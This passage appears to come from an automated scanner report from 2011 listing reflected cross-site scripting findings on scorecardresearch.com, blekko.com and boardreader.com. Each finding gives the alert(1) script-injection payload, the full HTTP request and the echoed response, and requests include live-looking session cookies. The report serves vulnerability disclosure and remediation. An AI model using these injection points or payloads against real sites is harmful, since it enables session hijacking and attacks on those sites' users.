http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:54 GMT Date: Wed, 02 Feb 2011 15:31:54 GMT Connection: close Content-Length: 3603
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:54 GMT Date: Wed, 02 Feb 2011 15:31:54 GMT Connection: close Content-Length: 3603
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:54 GMT Date: Wed, 02 Feb 2011 15:31:54 GMT Connection: close Content-Length: 3603
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:55 GMT Date: Wed, 02 Feb 2011 15:31:55 GMT Connection: close Content-Length: 3603
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ X-Requested-With: XMLHttpRequest Accept: text/plain, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fbl=2; v=1; sessionid=352926924
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1 Host: blekko.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Feb 2011 19:41:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close Cache-Control: max-age=43200 Expires: Thu, 03 Feb 2011 07:41:04 GMT Vary: Accept-Encoding Content-Length: 58 X-Blekko-PT: 9997f158d202984eeb76c315478564b1
1.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 19:19:53 GMT Server: Apache Pragma: Cache-Control: no-store, max-age=21600 Expires: Thu, 03 Feb 2011 01:19:54 +0000 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.84. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 19:18:59 GMT Server: Apache Pragma: Cache-Control: no-store, max-age=21600 Expires: Thu, 03 Feb 2011 01:19:01 +0000 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1"> ...[SNIP]...
1.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:02:03 GMT Server: Apache Expires: Thu, 03 Feb 2011 13:02:10 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.86. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:01:40 GMT Server: Apache Expires: Thu, 03 Feb 2011 13:01:45 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1"> ...[SNIP]...
1.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:05 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:18 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1"> ...[SNIP]...
1.88. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:45 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:47 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:58:29 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:58:37 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1"> ...[SNIP]...
1.90. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:58:55 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:59:00 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:53 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:09 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1"> ...[SNIP]...
1.92. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:22 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:24 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
